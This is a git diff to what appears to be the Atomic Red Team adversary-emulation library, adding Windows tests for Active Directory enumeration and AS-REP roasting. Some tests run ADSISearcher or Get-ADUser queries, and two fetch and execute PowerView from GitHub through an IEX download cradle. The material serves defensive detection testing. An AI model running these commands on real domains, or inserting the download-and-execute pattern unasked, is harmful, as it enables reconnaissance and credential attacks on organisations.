diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 0a6f7538..4e598d60 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
@@ -781,6 +782,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -789,6 +791,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -857,6 +862,7 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 25300732..2a0ede05 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,5 +1,6 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -524,6 +525,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -532,6 +534,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -573,6 +578,7 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 253ca895..0c8c1184 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -8,6 +8,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
+ - Atomic Test #2: Get-DomainUser with PowerView [windows]
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1282,6 +1283,7 @@
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+ - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1291,6 +1293,9 @@
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+ - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
+ - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+ - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1374,6 +1379,7 @@
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+ - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 5a6fc548..9aca2c0d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -3,6 +3,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
- Atomic Test #1: Rubeus asreproast [windows]
+ - Atomic Test #2: Get-DomainUser with PowerView [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
@@ -906,6 +907,7 @@
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+ - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -915,6 +917,9 @@
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+ - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
+ - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+ - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -971,6 +976,7 @@
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+ - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 66dce2ee..32ccfe39 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -341,6 +341,20 @@ credential-access:
'
name: powershell
elevation_required: false
+ - name: Get-DomainUser with PowerView
+ auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
+ description: 'Utilizing PowerView, run Get-DomainUser to identify domain users.
+ Upon execution, progress and info about users within the domain being scanned
+ will be displayed.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+ name: powershell
T1552.003:
technique:
external_references:
@@ -55087,6 +55101,18 @@ discovery:
-Server #{domain}
'
+ - name: Enumerate Active Directory Users with ADSISearcher
+ auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+ Upon successful execution a listing of users will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
T1069.002:
technique:
external_references:
@@ -55280,6 +55306,71 @@ discovery:
executor:
command: "#{adfind_path} -f (objectcategory=group)\n"
name: command_prompt
+ - name: Enumerate Active Directory Groups with ADSISearcher
+ auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+ Upon successful execution a listing of groups will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+
+'
+ - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+ auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+ description: |
+ When successful, accounts that do not require kerberos pre-auth will be returned.
+ Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Computer must be domain joined.
+
+'
+ prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+ {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host Joining this computer to a domain must be
+ done manually.
+
+'
+ - description: 'Requires the Active Directory module for powershell to be installed.
+
+'
+ prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
+ 0} else {exit 1}
+
+'
+ get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+
+'
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties
+ useraccountcontrol | Format-Table name
+
+'
+ - name: Get-DomainGroupMember with PowerView
+ auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
+ description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain
+ users. Upon execution, progress and info about groups within the domain being
+ scanned will be displayed.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+ name: powershell
T1482:
technique:
external_references:
@@ -57521,6 +57612,18 @@ discovery:
Write-Host $Computer}
name: powershell
elevation_required: false
+ - name: Enumerate Active Directory Computers with ADSISearcher
+ auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+ description: |
+ The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+ Upon successful execution a listing of computers will output with their paths in AD.
+ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
T1518.001:
technique:
id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index cb53f87d..3055bdc6 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -36,6 +36,8 @@ Specific to macOS, the bonjour protocol exists to discover addition
- [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
+- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher)
+
@@ -634,4 +636,34 @@ write-host "This PC must be manually added to a domain."
+
+
+
+## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+Upon successful execution a listing of computers will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+```
+
+
+
+
+
+
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 478cf7a8..999930da 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -22,6 +22,12 @@ Commands such as net group /domain of the [Net](https://attack.mitr
- [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
+- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher)
+
+- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview)
+
@@ -308,4 +314,113 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
+
+
+
+## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+When successful, accounts that do not require kerberos pre-auth will be returned.
+Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Computer must be domain joined.
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually.
+```
+##### Description: Requires the Active Directory module for powershell to be installed.
+##### Check Prereq Commands:
+```powershell
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+```
+
+
+
+
+
+
+
+## Atomic Test #11 - Get-DomainGroupMember with PowerView
+Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+```
+
+
+
+
+
+
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 254f6d75..55e4e2bd 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -26,6 +26,8 @@ Commands such as net user /domain and net group /domain
@@ -441,4 +443,34 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+
+
+
+## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+Upon successful execution a listing of users will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 02e8be5a-3065-4e54-8cc8-a14d138834d3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
+```
+
+
+
+
+
+
diff --git a/atomics/T1558.004/T1558.004.md b/atomics/T1558.004/T1558.004.md
index 9d552e79..a294efbc 100644
--- a/atomics/T1558.004/T1558.004.md
+++ b/atomics/T1558.004/T1558.004.md
@@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
- [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast)
+- [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview)
+
@@ -76,4 +78,33 @@ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable
+
+
+
+## Atomic Test #2 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d6139549-7b72-4e48-9ea1-324fc9bdf88a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+```
+
+
+
+
+
+